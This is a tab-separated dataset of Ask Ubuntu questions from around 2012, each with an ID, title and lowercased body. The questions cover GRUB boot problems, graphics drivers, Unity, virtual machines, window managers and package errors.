122535	intel core i3 cpu is not 64 bit ?	according to this page : https : //help.ubuntu.com/community/32bit_and_64bit the following intel cpu 's are 64bit : intel f and 5x1 series pentium 4 using the `` prescott '' core pentium d core 2 ( solo , duo & quad ) core i5 ( all ) core i7 ( all ) is n't the core i3 64 bit too ?
122537	unable to connect vodafone huawei dongle	i am using ubuntu 11.04 and i am trying to connect vodafone huawei dongle to access internate , but i am not getting any success to connect the net.can someone tell me where i am doing the wrong part ? any help and suggestions will be highly appreciable .
122549	how to shred a folder ?	i want a command to shred completely the contents of a folder/directory ( which may be inside folders/directories ) . also please explain the command .
122559	libreoffice-mono integration	i had an old .net framework application running with mono using openoffice and it worked very well . now i 've just installed ubuntu 11.10 server and i discovered that it moved to libreoffice , so i installed this suite on windows , compiled using libreoffice 's cli dlls and ( on windows ) it works . on ubuntu i installed libreoffice using sudo apt-get install libreoffice , but when i try to run my exe i get a `` typeload exception '' ; after an hard debug ( see http : //stackoverflow.com/questions/10029620/mono-libreoffice-system-typeloadexception ) i discovered that cli libraries are missing . i remember that with openoffice i had to install cli-uno-bridge package , but i 'm able to find it anymore on oneiric . i 've also tried to use updatedb and then locate cli- , but these libraries seem to miss on my system . how can i install them ? basicly : i need to run a mono application using libreoffice ... thanks update : i found on this web page deb packages i need ( yes , i know , they are not supported ... but just to try ) ; so i downloaded them and tried to install with dpkg -i *.deb , but i canno install dpkg -i cli-uno-bridge_3.4.3-3~bpo60+1_i386.deb cli-uno-bridge depends on libuno-cli-cppuhelper1.0-cil dpkg -i libuno-cli-cppuhelper1.0-cil_1.0.22.0+libo3.4.3-3~bpo60+1_all.deb libuno-cli-cppuhelper1.0-cil depends on cli-uno-bridge so , one depends on the other ... is there a way to solve this ?
122560	unity 3d suddenly no longer working on my wubi install	i 'm running ubuntu 11.10 on my hand-built tower ( important specs : intel core 2 duo 3 ghz , 8gb of ram , nvidia geforce 8800 gts with 640 mb of video ram ) . it 's a bit of a weird setup because i installed wubi to my hard drive containing windows xp and then later installed windows 7 to a different drive , but that 's neither here or there . the last time i booted into ubuntu , which was probably a few days ago , unity 3d worked just fine . a little slow , but fine nonetheless . today i boot up , and unity does n't want to work at all . the top bar turned into rainbow glitchiness if i tried to do anything , the dock bar would not do anything , and the whole thing was insanely unresponsive . i 'm not entirely sure what the problem could be . windows 7 felt the need to run chkdsk completely out of the blue recently , but since it only scanned c : and wubi is n't installed at what windows 7 thinks of as c : , i find it hard to think it 's that . ( the last time chkdsk ran on a computer i owned , it was on a dell laptop trying to fix a defective hard drive , and it caused more damage than it fixed . so i 'm suspicious of chkdsk . ) i ca n't think of any major updates that occured recently that could lead to this . thankfully , unity 2d still works , so i 'm not completely locked out . i was using nvidia 's proprietary drivers ( the one marked `` recommended '' , whichever one that may be ) , and they worked fine until recently . any ideas what i could do ?
122561	high cpu usage while playing flash and using jupiter	hi guys from what i see by googling around it 's a common problem but somehow all the threads i 've seen end in `` oooo flash is terrible '' and the post dies there . i 'm experiencing a very high cpu usage 100 % and more while watching any flash videos . what i 'm running : latest flash version available for 64bit in ubuntu 's repositories athlon x2-ql64 on a hp compaq 615 note that i 'm experiencing the same issue on a celeron t3300 with intel video card what i tried : different browser ( firefox and chromium behave the same ) disabled the separate plugin-container process and made flash run in firefox.exe ( same behaviour ) changed shell . gnome3 and unity behave the same flash ads blocker ( prevents 100 % loading just until i actually play the video so it really does n't make a difference ) open source flash players . gnash gives me a very low framerate and a super high cpu usage anyway . lightspark is unable to play youtube videos and insta-crashes html5 video playback gives the same super high load if it can i noticed that xorg usage is low while playing ( i saw posts where people seemed to have a very high xorg cpu load but it 's not my case ) any is really appreciated since i fell in love with linux and ca n't stand to see windows perform way better on the same machine update : turns out after hours that i 'm half idiot half forced to do it . let me explain i 'm using jupiter to keep the temps under control and using it constantly in power save mode to save about 10째c . if i use the `` ondemand '' governor the cpu usage goes down to about 50 % while playing ( cpu freq doubles in the case of my cpu ) if i set it to `` maximum performance '' it goes down to about 45 % but my cpu goes to about 85c째 so basically the reason is that it 's actually using 100 % because it needs to and not for strange reasons but i ca n't afford to cook my battery just to see the cpu usage go down by 50 % so i 'll just keep it like it is since the playback looks fine even at constant full load . i just hope 12 . 04 will run cooler
122566	live usb not booting in lenovo ideapad z570	i have a lenovo ideapad z570 with most recent bios version . i created a usb stick to book ubuntu from but the ideapad does not list/show the stick when i want to select it for booting ? i did try all usb sockets on the machine as well as multiple sequences in the bios for booting . how can i get the notebook to boot from the usb ? ps : the usb stick works fine on a lenovo thinkpad t410 and i did update the bios as suggested in this question .
122569	no grub menu after installing 11.10 64b on top of windows 7 home pro 64b	i 've installed -correctly- ubuntu 11.10 64b on top of windows 7 home pro 64b but the grub menu is not showing on laptop boot . the laptop is a samsung rv420 . i ran a tool called boot-repair but did n't apply suggested patches . i generated a log instead , which follows : http : //paste.ubuntu.com/930272/ so , which should be the instructions i should execute in the ubuntu livecd so i can make grub show correctly ? of course , without crapping windows installation thanks
122570	dell vostro 1550 and ubuntu upgrade	i have just got this new dell vostro 1550 ci3 today ( 16th april 2012 ) with ubuntu 10.10 in it . as this version is going to be outdated at end of april . is it advisable to install 12.04 over this machine ? or the warranty will be void if there is new installation of linux on this machine ? what to do ? upgrade or keep the version for next 6 months ?
122579	udev creates device file for usb key , but not for partitions	most usb keys work on my system : plug one in and udev will create a device file for the key as a whole ( e.g . /dev/uba ) , as well as a device file for the partition ( e.g . /dev/uba1 ) . i have a specific usb key ( a sandisk cruzer micro 2gb ) which udev misbehaves with . the device file for the key is created , but not for the partition . if i compare the dmesg output between a working key and my problem key , it is identical except for one line which is missing when using the problem key : uba : uba1 . it would appear from this that mknod is never creating a node for the disk partition . the weird thing is that i can do ... sudo sfdisk -r /dev/uba ... to force drive partitions to be re-examined and suddenly the partition will be recognised , mknod will create a device file it and i can access the key all fine and dandy like . some kind of timing issue ? edit : automount usb rules : action== '' add '' , kernel== '' ub [ a-z ] * [ 1-9 ] * '' , program= '' /sbin/blkid -o values -s type % n '' , result== '' vfat '' , run+= '' /home/ubuntu/.mount_usb % k % n '' action== '' remove '' , kernel== '' ub [ a-z ] * '' , run+= '' /home/ubuntu/.unmount_usb '' also : the problem key defaults to fat16 when being reformatted . forcing it to fat32 results in udevadm monitor -- property spitting out exactly the same properties for the device and partition as for a working key , but the problem still remains . this leads me to think that it 's less likely to be a problem with the device detection rules and perhaps a problem with the device itself ? is this a logical conclusion ?
122588	x11vnc not working in ubuntu 12.04	x11vnc used to work fine , but in the new 12.04 release i ca n't get it to work . 16/04/2012 17:22:35 x11vnc version : 0.9.12 lastmod : 2010-09-09 pid : 16524 16/04/2012 17:22:35 xopendisplay ( `` '' ) failed . 16/04/2012 17:22:35 trying again with xauthlocalhostname=localhost ... 16/04/2012 17:22:35 16/04/2012 17:22:35 *** xopendisplay failed . no -display or display . 16/04/2012 17:22:35 *** trying `` :0 '' in 4 seconds . press ctrl-c to abort . 16/04/2012 17:22:35 *** 1 2 3 4 16/04/2012 17:22:39 xopendisplay ( `` :0 '' ) failed . 16/04/2012 17:22:39 trying again with xauthlocalhostname=localhost ... 16/04/2012 17:22:39 xopendisplay ( `` :0 '' ) failed . 16/04/2012 17:22:39 trying again with unset xauthlocalhostname ... i 've already tried various kinds of `` -auth '' parameters , none worked .
122591	12.04 change launcher icons to 32px instead of 48px	prior to a recent update in 12.04 there was a slider in settings ( appearance ? ) where you could change the icons from 48px to 32px . this seems to have vanished and the icons are back to 48px in size . how do i set it back down to 32 ?
122595	loign screen ( lightdm ) background is black in ubuntu 11.10	hi i have installed ubuntu tweak in ubuntu 11.10 . i changed the login screen ( lightdm ) background using it . but as i logged out to see the new login screen background but all i got a black background with dots over it . i am disappoint and found no solution of the problem elsewhere . i can login but the background is black.please guys help me how to fix this !
122596	how can i ensure that a minimal set of processes are running on ubuntu 11.10	i 'm running experiments via python & pygame that are time-sensitive and i 'd like to reduce all the os 's background processing as much as possible while still being able to do things like detect keyboard/gamepad/mouse input , show things on screen , and play sounds . how could i go about killing all superfluous processes ?
122601	what software should i use for creating sound files for game development ?	i am developing games on python , i need some easy to use software that can create sound files . format can be anything .midi , .mid , .wav , .mp3 it does n't matter . i can also download games sound from internet , but i want to make my own sound for the games . the software must be easy to use , and if that software is lightweight that would be great !
122602	how do i get java plugin for chrome ?	i 'm new with ubuntu , and i just downloaded java from here : http : //java.com/en/download/linux_manual.jsp and i am trying to follow this instal guide : http : //java.com/en/download/help/linux_install.xml # selfextracting but i 'm not getting anywhere . after typing chmod a+x jre-6u31-linux-i586.bin it says `` no such file or directory '' i 'm using ubuntu 11.10 , 32bit
122615	how to customise grub after moving os to thumbdrive	i 'm trying to make a bootable thumbdrive using ubuntu 10.04 , and have come across a problem with grub . i am able to make a bootable ubuntu installation on a thumb drive either using a livecd or actually installing ubuntu . however , i want to heavily customise that installation , which takes far too long to do when trying to apply to the thumbdrive installation . as a result , i want to make an installation of ubuntu on my laptop hdd , in a separate partition to a windows installation , and do my customising there ( as it is a lot quicker ) . then i will use fsarchiver to copy that installation to the thumbdrive , which should then be bootable . it seems to have mostly gone fine , except that when i try to boot from the usb drive grub comes up with the error that there are missing operating systems . as a result , i can only manage to boot from my hdd . how do i avoid this ? i know the reason is that grub expects to find windows xp and a second ubuntu installation , which are not on the thumbdrive , but is there a way to customise grub once it is on the thumbdrive , considering that i can not boot into it ?
122618	i am running unity 3d without nvidia driver in ubuntu 11.10 !	you will perhaps amaze as i was but i am running unity 3d in ubuntu 11.10 without nvidia driver and i hereby uploading the screen shot to prove this . so my question is that will i even need to install the nvidia driver ? and what is running to run this unity 3d ? ? here is a screenshot :
122621	virtualbox : how to capture screen shots of ubuntu 11.10 guest on windows hosts using ubuntu shutter utility ?	i have an ubuntu 11.10 guest running within virtualbox , on a windows 7 host . i have the 3d acceleration option selected for the guest and i am able to access unity 3d and compiz . i find the whole experience of developing with the guest os very productive . : ) when running ubuntu normally , not as a guest , i.e . in a dual boot arrangement , i would use an application like shutter to grab screen shots for documentation etc . however , after moving to a virtualised environment , when i try and capture from shutter the entire screen just blacks out -- i am running ubuntu guest fullscreen . when i then try to make some kind of selection anyway ( blind to the actual content i am selecting of course ) , i just get a blank white image . i am not surprised that i am having such difficulties . i guess it is due to how shutter is accessing the pixel content of the desktop via either the xorg stack , or through some interface to the working memory of the graphics card ; there just must be a difference when running in a vm vs natively , but my knowledge bottoms out here : ( i tried using the gnome screen shot utility and it seems to suffer from the same problem ; i could have lived with it 's limited feature set if it had worked . then i tried enabling the screenshot plugin from compizconfig settings manager and hey presto i got images ( they are saved on the desktop ) , but the power of this facility of compiz -- holding the windows key and drag-selecting an arbitrary region of the screen -- is painfully limited compared to the feature set offered by shutter . even if a solution for shutter is not forthcoming , some insight into how the screen capture tool interfaces to the xorg or gpu driver that can shed some light on this would be great . a specific solution for use with shutter would be champion !
122623	screen flickering / scrambling on an asus ul30a	recently my laptop screen started to flicker . you can view the phenomena here : youtube sometimes the screen is totally scrambled , but most of the time it starts with the title bar only . it happens inconsistently . my laptop is asus ul30a and i 'm using ubuntu 11.10 . output from command : sudo lshw -c display ; lsb_release -a ; uname -a ; xrandr *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : fe400000-fe7fffff memory : d0000000-dfffffff ioport : dc00 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : fe800000-fe8fffff lsb version : core-2.0-ia32 : core-2.0-noarch : core-3.0-ia32 : core-3.0-noarch : core-3.1-ia32 : core-3.1-noarch : core-3.2-ia32 : core-3.2-noarch : core-4.0-ia32 : core-4.0-noarch distributor id : ubuntu description : ubuntu 11.10 release : 11.10 codename : oneiric linux steelke 3.0.0-14-generic-pae # 23-ubuntu smp mon nov 21 22:07:10 utc 2011 i686 i686 i386 gnu/linux screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 lvds1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) i already rolled back the kernel to 3.0.0-14 instead of 3.0.0-17 as mentioned in this post , but without result . i guess the problem is related to the driver , because i do n't see similar behaviour in the bios setup . any tips or help is welcome .
122630	3d acceleration is not possible for ubuntu as virtual machine by vmware fusion ?	i have installed vmware fusion 4.1.2 in my macbook pro , and installed ubuntu 11.10 as a virtual machine . i have tried to enable the 3d acceleration , via virtual machine - > settings - > display of the menu , we have the following setting : the note does not mention whether it works for ubuntu ... to do a test , i choose ubuntu instead of ubuntu 2d when i log in , but it still looks like 2d , and echo $ desktop_session gives ubuntu-2d . do you confirm that today vmware fusion 4.1.2 is not able to enable 3d for ubuntu ? ps : graphics info : amd radeon hd 6770m 1024 mb
122634	what other options are there apart from localnet in dnsmasq ?	i was wondering if dnsmasq had any other options in it 's configuration files than localnet ? i would like to define a dns server to use in the dnsmasq configuration file . rather like this : $ server=/internet/8.8.8.8 i am not sure if this would work . i am using ubuntu 10.04 lts .
122636	would microsoft visual studios c++ 2010 work on ubuntu ?	i want to use ubuntu but i 'm not sure if it will work for microsoft visual studios c++ 2010 . or is there another program that will work on ubuntu that will work just as good ( if not better ) than visual studios ?
122639	how to start xmonad ?	i am under gnome , and a ubuntu 11.10 as virtual machine , which does not enable 3d accelaration . i just downloaded xmonad via software center . i guess the first step is to replace the current window manager ( metacity ) , and then set or learn the shortcut keys . but when i launch xmonad in a terminal , that gives me : /home/ ... /.xmonad/xmonad-x86_64-linux : executefile : does not exist ( no such file or directory ) x error of failed request : badaccess ( attempt to access private resource denied ) major opcode of failed request : 2 ( x_changewindowattributes ) serial number of failed request : 7 current serial number in output stream : 8 could anyone tell me how to start ?
122648	12.04 and evolution 3.2.3 html email rendering issue	i 've been running the 12.04 release now for a few months and my biggest issue is selecting text ( highlighting ) in an html email that is received in evolution 3.2.3 . attempts to select text or hyperlinks in received email causes text to be selected from that point all the way back to the beginning of the email header . if i forward or reply to the message the newly edited message text selection works fine . any fix for this ? running 12.04 lts with all current updates as of this writing and using evolution 3.2.3 .
122656	problem executing command from keyboard shortcuts	i created some shortcuts to control the audio volume of my laptop , as the default system shortcuts ( fn + f4 / f5 ) are n't supported . i downloaded a script which allows me to increase/decrease/mute pulseaudio volume . i created some script which contains the order of increasing/decreasing the volume : pulseaudio_volume-decrease.sh the problem is , each time it is executed , it creates a `` pavolume '' file in my home dir that i do n't want . thus , i added `` rm pavolume '' next to the previous command : pulseaudio_volume-decrease.sh ; rm pavolume when i run it from the terminal , everything is fine ; but , strangely , when i call the shortcut ( with gnome 'keyboard ' settings ) , it fails , telling me `` error while trying to run ( pulseaudio_volume-decrease.sh ; rm pavolume ) which is linked to the key ( shift + f5 ) '' . what have i done wrong ? i am running on ubuntu 2d ( unity ) 11.10
122658	internet connection issues	i am running 11.10 and having issues getting ( and maintaining ) wireless connections . i 've been able to gain access when i 've first turned on my computer in the past , but it will cut out after a short time and i wo n't be able to log back on . if i wake my computer from sleep mode , it wo n't be able to connect at all . what is now worse , is i recently connected directly to the internet with a wired connection . that worked for a short period of time but i just tried to connect using it again and now it seems that it too is n't working . i am new to linux , and am not a programmer , so i apologize as you may have to simplify your answers for me - but i do know where terminal is ... thank you in advance .
122662	different responses when telnetting into mysql 's port via hostname	i 'm trying to connect to mysql server installed on my computer . when i enter `` telnet localhost 3306 '' , i get some garbage characters meaning that i 'm connected to the server . but when i enter `` telnet my_computer_name 3306 '' , i am getting this error : trying 127.0.1.1 ... telnet : unable to connect to remote host : connection refused i know that i has something to do with the firewall . i also pasted output of my iptables-save here : http : //pastebin.com/rkmc1bg8 i tried to add a rule to accept incoming connecting to 3306 but no success . any fix ?
122664	harddrive repair/ computer repair	i 'm constantly repairing computers for others and one of my biggest things is pulling the hd and connecting it externally to remove viruses , repair part ions or recover files . i have used ubuntu for a little while now but never switch my computer that i use for my repairs . i 'm just wondering what programs ubuntu has for this sort of stuff . i was using mini-tools in windows . i know it 's got to be easier and way more fun in ubuntu and am dying to give it a try .
122666	do n't know which masculine key is	when i push and hold super key , there 's showed the sorhtcuts , and in the swiching section is showed `` alt + masculine '' and i do n't know which key is masculine key , can you explain me which key is ? also , i do n't know if it matters , but i 'm spanish , and i searched about masculine but i did n't found anything but man . thank you in advanced !
122667	is it wise to remove standard software and replace them with personal preferences ?	i am lucky that hard disk space is not an issue however there are applications that come with the ubuntu distro that i will never use and i have preferences for other packa ges . for example i use k3b not brasero for burning dvds . are there any lts support or stability issues if i remove unwanted/unused packages from my system ?
122668	is it possible to login as the same user with 3 different environments kde , gnome and unity	is it possible to login simultaneous as the same user with 3 different environments kde , gnome and unity ? or even more with xfce and lxde ? how can i do that ? i am using ubuntu 12.04 beta , but also have have ubuntu 11.10 installed . i ask this question cause i have 3 different users and i would prefer to only have 1. and i think it would be more easy to handle if i decide to launch the 3 at same time .
122674	is there a shortcut to tile windows to left or right side of the screen ?	as compiz grid is not supported in ubuntu-2d , i am looking for alternative to tile windows . this video shows that xfce4 and xfwm4 can snap windows to a part of the screen . i would like to do that by keyboard shortcuts . i have already installed xfce4and xfwm4 , but i do n't see which one in the following list does the job : could anyone help ?
122675	why ca n't i run a package installed in `` /usr/local/bin '' ?	after compilation of a package , make install installed the package 's files in /usr/local/bin but when i double click on the file inside /bin it does n't work . i followed all the steps to compile the package and i see it is installed in this /usr/local/bin location , but how to i open it ?
122678	need help , i broke my ubuntu user 's login . ca n't login	i 'm a web developer so i was attempting to install php5/nginx for local developing . i 'm not sure if either of these commands did it , as timing was not immediate , but i am no longer able to login to my main account ( sending this message from ubuntu guest ) recent cli commands : sudo usermod -a -g www-data bngreer sudo su bngreer sudo subl /etc/nginx/sites-available/dev + ctr+c ( the latter seems to have crashed an open firefox instance also ) i 'm not entirely sure how to check user login settings to see what can be fixed , i really would prefer not to erase and reinstall as i have some valuable data . any help would be appreciated
122680	ca n't boot from usb after installing ubuntu	i bought a samsung series 5 notebook and a very strange thing happened : i installed ubuntu 11.10 from a usb pen drive but when i restarted ( i cleared the existing partitions ) i stopped being able to boot from any usb device , whatever i change at bios , it always goes straight to grub2 . just to add something to the mix , now i ca n't boot properly after upgrading to precise ( separate question )
122683	upgrade to precise messed up grub2	i just upgraded from oneiric to precise and it messed up my grub2 , now i ca n't boot and keep getting an `` error : no such partition '' error . this is not the first time this happens but now i ca n't seem to boot from usb ( separate question ) to repair grub2 and i ca n't find my way in the rescue console .
122684	look for a tiling window manager , 2d , enabling shortcuts	i am still struggling in looking for a tiling window manager . what i need is not complicated , i just would like to be able to tile windows to the left/right/up/down half of the screen , by keyboard shortcuts . normally compiz giddoes a perfect job for this ... unfortunately , the constraint is that as my ubuntu 11.10 is a virtual machine under mac os by vmware fusion , the 3d acceleration is not enabled . so compiz grid is not a solution for me . i have tried xmonad , but i do n't like the layout , it is too different from a normal and traditional desktop environment . bluetile also looks to me that way ... i have tried xfce4 and xfwm4 , but i still ca n't find the shortcut keys to tile windows . could anyone suggest me a window manager , ideally they have already tried , to realize tiling functionality with shortcuts ?
122686	rename leaving trailing character	this one should be simple for anyone who knows the correct way to escape . i 'm attempting to batch rename a few hundred files that had \u0026amp ; pushed into the file names instead of and or & . i tried using : rename s/ '' \\u0026amp ; '' / '' and '' /g * but and getting names like excision \uand datsik - calypso.mp3 you can see the \u was n't escaped properly . what 's the way to escape my \ ? ? thanks
122689	save .csv with formulas ?	it seems to be an undocumented/unsupported feature , but if you open a csv ( comma separated spreadsheet ) with libreoffice , it will calculate formulas that start with = in the text file . unfortunately i do n't see a way to keep the formulas when saving back to csv , it simply writes the numbers . is there some option to keep formulas ?
122691	how can i capture url requests ?	i run firefox with -no-remote so i can use multiple profiles . this means applications which try to open urls do n't work . can i setup some form of bash script that will notify me of the attempted url request so i can manually copy/paste it into firefox ? was thinking all i needed to do was make a bash script then set it as the default browser , however in order to set the browser you seem to use update-alternatives which does n't give the option of using a user made script . $ sudo update-alternatives -- config x-www-browser there is only one alternative in link group x-www-browser : /usr/bin/firefox nothing to configure .
122696	is there a modern and clear tutorial on setting up ssl for localhost / testing use ?	let 's say i 'm developing a script for login.example.com . i have absolutely no access to login.example.com , but that page loads a script on assets.example.com ( which i have access to ) . to test how well my new script works on the production login page , i changed my /etc/hosts to point assets.example.com to my localhost ( and set up apache accordingly ) . the only problem now is that the login page loads https : //assets.example.com/script.js ( again , i have no influence on this ! ) . so in order for me to test my script , i need to set up a self-signed ssl cert . i followed the directions here : https : //help.ubuntu.com/11.10/serverguide/c/certificates-and-security.html i also tried using the default-ssl to test it to no avail . i simply constantly get ssl connection error : // error 107 ( net : :err_ssl_protocol_error ) : ssl protocol error . ( chrome ) thanks ! update : since we 're now at 12.04 lts & & 12.10 , the tutorial should address these versions .
122699	how to remove package in bad state , software center freezes , no synaptic	when 'update manager ' starts running , it tells me that i need to do a 'partial upgrade ' , when i start doing the upgrade , it tells me '' remove package in bad state the package 'linux-headers-3.0.0-19 ' is in an inconsistent state and needs to be reinstalled , but no archive can be found for it . do you want to remove this package now to continue ? '' when i click 'yes ' the program just closes . i have tried to go into the software center and reinstall the 'linux-headers-3.0.0-19 ' ubuntu software center just freezes . right now i can not run 'synaptic ' , or remove any software . please help !
122701	using ppa for on older version	if i were , for example , to be on 12.04 , but there were ppa 's that did not have precise releases , could i change the ppa entry to use oneiric rather than precise ? would that cause problems ? if my question is unclear ( it probably is ) , feel free to ask me for more information .
122711	fix messed up themes in 12.04	i recently updated to ubuntu 12.04 beta 2 and lots of the themes i have look messed up . they either have black backgrounds where it should be white or the text becomes white to match the backgrounds , making it illegible . as you can see in the screenshots , this varies from theme to theme . is this a problem with the themes or a problem with the beta and is there anyway to fix this ?
122713	collada plugin for blender missing ?	i 've installed blender , version 2.58.0 that comes with ubuntu 11.10 , everything works fine but i ca n't export to .dae ( collada ) . it seems blender 2.5x comes with the exporter plug-in already , however it 's not there . i 'm running ubuntu in an amd 64 bits . i did try to install the plug-in from the collada website , but without success . how can i install the plug-in or make blender find it ?
122717	login/logoff and alert sounds are not working ?	i tried to chage the sound theme using dconf but on every restart the value is reset back to freedesktop ! ? ! what should i do ? how i can save the setting ? ! ! i can enable login sound using dconf though shutdown sound is not working .
122720	how well does a hp pavilion dm1-4013nr work ?	i have an hp pavilion dm1-4013nr . has anyone installed ubuntu on this computer ? what sort of problems can i expect ? i would like to set it up as a dual boot with windows 7 .
122723	windows disk 's partition ( s ) are misaligned : ca n't mount	i have installed windows on a 500gib seagate sata disk , ( on a new efi computer ) and once windows was all setup , i plugged my ubuntu ( 11.10 x64 ) hdd in and booted it . all works fine , apart from when i try to access data from the windows partition : **warning** : the partition is misaligned by 3584 bytes . thus may result in very poor performance . repartitioning is suggested . it does n't appear to see the two ( windows boot/recovery and windows system/data ) partitions there . is there any way that i can get the system to recognise ( mount ) the partition ( s ) without re-installing windows ? edit : gparted appears to pick the partitions up , but complains : oh , and /etc/mtab does exist . edit2 : booting from a 11.04 x64 live cd , the drive can be mounted through nautilus fine and gparted does not report any errors . edit3 : i ended up wiping and re-installing both oses , as ubuntu was doing this ( which does not occur with a new , un updated install ) and windows was refusing to boot with another drive plugged in . thanks for the help !
122725	how to show unread count on messaging menu ?	is there a way to show unread count on messaging menu icon , without opening it ? i 'm using ubuntu 11.04 .
122729	i want to learn sql and pl/sq , what database should i use ?	i am using ubuntu 11.10 and i want to learn sql and pl/sql . can someone please advice me the most suitable database that i should install ?
122733	two ssd in thinkpad w520 and internal raid - not enabled	looking for some suggestions : i have bought a lenovo thinkpad w520 with a ssd of 160 gb . windows 7 came as a default os . my storage subsystem has `` internal raid not enabled '' . i want to replace my optical drive bay by a 2nd ssd of 180 gb where i would like to install ubuntu so that i can dual boot linux and windows . my questions are , can i do this with this configuration ? what does `` internal raid '' mean ? is it true that `` internal raid not enabled '' will not allow me to use 2nd ssd as a system drive ? thanks in advance !
122735	error with kernel 3.3.2 in ubuntu 12.04 beta 2 64-bits ( with the updates to the date )	today had decided to install the latest stable kernel from mainline canonical from this link . the latest stable kernel is 3.3.2 , then i downloaded the *.deb 's for my 64-bit version , and downloaded to a folder . then apply `` sudo dpkg-i * . deb '' when i restarted the notebook , it did not show the splash of `` ubuntu '' or charge anything , just stayed freeze ... i try the recovery module , and did not show any improvement.the only way to enter the ubuntu `` gui '' was with the kernel , the 3.2.0-23-generic previously installed . somebody can help me ? can you tell me what i 'm doing wrong ? presumably those steps should be sufficient to have the latest kernel on your system .
122740	how do i install the login screen from a minimal installation ?	as construct ubuntu - unity environment from the minimum ubuntu - core then using apt-get install unity , i can not see the window to pop out to me to choose languages and other settings when login first time . anyone knows how to finish that if i want to custmize my image on our board ?
122748	enabling native shortcuts on gnome - 3	how can i enable the native shortcuts like alt + ctrl + t : terminal alt + ctrl + d : show desktop on gnome 3 .
122750	geforce 6800 fan speed control ; nvclock segmentation fault	i recently did an update on my ubuntu 11.04 . unfortunately i ca n't remember what was updated , but i am sure there were some core things . anyway , before that update i could change the fan speed , due it 's heavy loudness , with an application called nvclock . when i try to use it now with : nvclock -f -f 70 i only get following reply : segmentation fault so how can i get it back working , because it 's really annoying loud
122751	blender 2.62 tutorial for architectural works ?	i just want to learn all staff aboout blender and how to work with it.i am trying to go on linux only and without a windows partition in my system ! so i can not work with autocad in linux also with 3ds max.so i want to work with blender , bricscad and maya.the starting for me will be with blender.so are there any tutorials ( complete , step by step ) for me to work with precision and dwg importing from brics and then export again etc.. thanks !
122752	equivalent of ctrl-a ctrl-a in byobu ( switching windows )	in gnu screen , i could type ctrl+a twice to switch between two windows . in byobu , i ca n't see how to do that . f12+ctrl+a does n't work , and i ca n't find anything in the manual . to be clear , i do not want to change the escape sequence to ctrl+a . i want a key sequence that would switch between current and previous window .
122758	ubuntu `` fonts '' lense ?	i use a lot of ubuntu-versions with unity . i have a question about the lense-type `` fonds '' ? there are no `` apps available for download '' in the ubuntu software center . which benefit brings this lense-type ? ? and further - when i want to create a custom launcher , which category-type is to set in the corresponding .desktop-file ? e.g . : a custom launcher for a game - the `` .desktop-file '' contains : ... categories=game ; ... here is the category for the correct display in unity dash under type games : `` game '' is it `` font '' for the type `` fonts '' ?
122760	can an android phone control ubuntu like a remote ?	i am looking at making a budget media centre . i am new to linux and have not yet installed it but think i can manage . i want to use ubuntu and would like to use my android phones to control or work as a remote for media playing to a tv . my setup will be the media box to tv via hdmi ( no keyboard or mouse connected ) then to my wi-fi router via ethernet . so i want to be able to turn this pc on and after it 's booted directly from my phone control the pc remotely to open the media application and run videos and open photos directly to the tv . i am using a samsung galaxy s ii and soon a new sony for the wife .
122764	how-to properly create a launcher ( .desktop-file ) - unresolved & zenity hangs	title : zenity hangs & .desktop files dont have the desired effect environment : ubuntu oneiric x64 , gnome-shell , zfsonlinux motivation : automagically save state of all vm 's ( and config ) while virtualbox doesnt get in the way . approach : use a bash script to do that ( snapshot filesystem before starting virtualbox gui and after it is closed ) . additional detail : this basically is a one-user-system , and i allowed sudo for zfs commands to myself . problem ( s ) : + the ( zenity ) -notification sometimes stays invisible and hangs the script . thus the `` workaround '' function . [ edit : ] this one is better done using the first answer below . i changed the script to reflect that and had no hang since . - although the script seems to work ( its only used by myself , no multi-user requirement ) , i was unable have it in the launcher . [ edit : ] no solution until now . failed tries : problem 2 : - create .desktop-file , validate it with desktop-file-validate , install with desktop-file-install , reboot = > still not there although i installed to the recommended directories . i also used the suggestion from below to no effect . problem 1 : ( disregard , as it is solved ) files : myvirtualbox.desktop : [ desktop entry ] version=1.0 name=my oracle vm virtualbox genericname=virtual machine type=application exec=/home/datakanja/scripte/myvboxcall.sh tryexec=/home/datakanja/scripte/myvboxcall.sh icon=virtualbox categories=emulator ; system ; x-mandrivalinux-system ; comment=run several virtual systems on a single host computer comment [ de ] =vbox mit automatischen snapshots ausführen myvboxcall.sh : # ! /bin/bash set +e # weil egrep u.u $ ? < > 0 gibt # soll vor und nach des aufrufes von virtualbox , - falls die maschinen-daten sauber sind - zfs-auto-snapshot ausführen . if [ `ps -a | egrep -wc `` v ( irtual ) ? box '' ` = 0 ] then sudo /sbin/zfs-auto-snapshot -- quiet -- syslog -- label=vmstart -- keep=10 -r raid/backup/vbox zenity -- notification -- timeout=10 -- window-icon= '' info '' -- text= '' der zustand der vbox-verzeichnisse wurde gesichert . '' else zenity -- error -- text= '' eine vbox-komponente läuft bereits . daher weder snapshot noch programmstart möglich . '' exit fi /usr/bin/virtualbox if [ `ps -a | egrep -wc `` v ( irtual ) ? box '' ` = 0 ] then sudo /sbin/zfs-auto-snapshot -- quiet -- syslog -- label=vmexit -- keep=10 -r raid/backup/vbox zenity -- notification -- timeout=10 -- window-icon= '' info '' -- text= '' der zustand der vbox-verzeichnisse wurde gesichert . '' else zenity -- error -- text= '' eine vbox-komponente läuft noch . daher konnte kein snapshot angelegt werden . '' fi
122767	where is the `` about me '' dialog ?	looking for how to change my password the gui way i can not find the `` about me '' dialog in ubuntu precise ( 12.04 ) anymore . there is the `` user accounts '' dialog but you can not change your own password without being root . there is also the older `` users and groups '' that allows you to change your password , but the `` about me '' dialog was more user friendly .
